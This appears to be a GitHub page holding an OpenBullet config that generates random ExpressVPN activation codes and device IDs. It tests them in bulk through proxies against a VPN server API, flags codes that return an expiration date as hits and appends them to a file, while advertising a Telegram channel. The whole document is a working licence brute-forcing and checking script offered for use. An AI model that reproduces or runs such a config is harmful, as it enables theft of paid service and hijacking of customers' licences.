forked from WangLee112/Config-Open-Bullet
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathExpressVpn license Gen+Checker.anom
86 lines (77 loc) · 2.73 KB
/
ExpressVpn license Gen+Checker.anom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[SETTINGS]
{
"Name": "ExpressVpn license Gen+Checker",
"SuggestedBots": 50,
"MaxCPM": 0,
"LastModified": "2021-05-27T13:32:03.7275476+04:30",
"AdditionalInfo": "Telegram Channel: https://t.me/OpenBulletChannel",
"Author": "@Hogo_Victor",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "UserPass",
"DataRules": [],
"CustomInputs": [
{
"Description": "Author Telegram Id:@Hogo_Victor",
"VariableName": "",
"Id": 1379969594
}
],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
#rnd FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?h?d?h?d?h?d?d?h?d?d?d?h?h?d?d?d?d?d?h?h?d?d?d?h?d?d?h?d?h?d?h?h?d?h?d?h?h?d?d?h?d?d?d?h?d?d?d?d?d?d?d" -> VAR "rnd"
#rnd2 FUNCTION RandomString "E?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m?m" -> VAR "rnd2"
#Check_license REQUEST GET "https://www.ftrftcx.net/vpn_servers?activation_code=<rnd2>&ca_version=2&client_version=6.6.0&conn_requests=1&device_id=<rnd>&device_name=Windows&dpi=hdpi&include_country_and_region=1&include_pptp_l2tp_ipsec_servers=1&include_recommended_clusters=1&include_sstp_servers=1&os_version=win10.0.0&show_messages=1&smart_location=1&smartdns=1"
HEADER "Host: www.ftrftcx.net"
HEADER "User-Agent: Go-http-client/1.1"
HEADER "Connection: close"
HEADER "Accept-Encoding: gzip, deflate"
IF "<SOURCE>" Contains "authentication failed"
SET STATUS FAIL
ENDIF
IF "<SOURCE>" Contains "<expiration_date>"
SET STATUS SUCCESS
ENDIF
IF "<SOURCE>" Contains "Payment Verification Needed"
SET STATUS CUSTOM "FREE"
ENDIF
#expireDate PARSE "<SOURCE>" LR "<expiration_date>" "</expiration_date>" -> VAR "expireDate"
SET CAP "license" "<rnd2> | expireDate: <expireDate>"
SET CAP "Telegram Channel" "https://t.me/OpenBulletChannel"
#Save UTILITY File "ExpressVpn Gen+Checker Hits.txt" AppendLines "license: <license> | Telegram Channel: https://t.me/OpenBulletChannel" -> VAR "Save"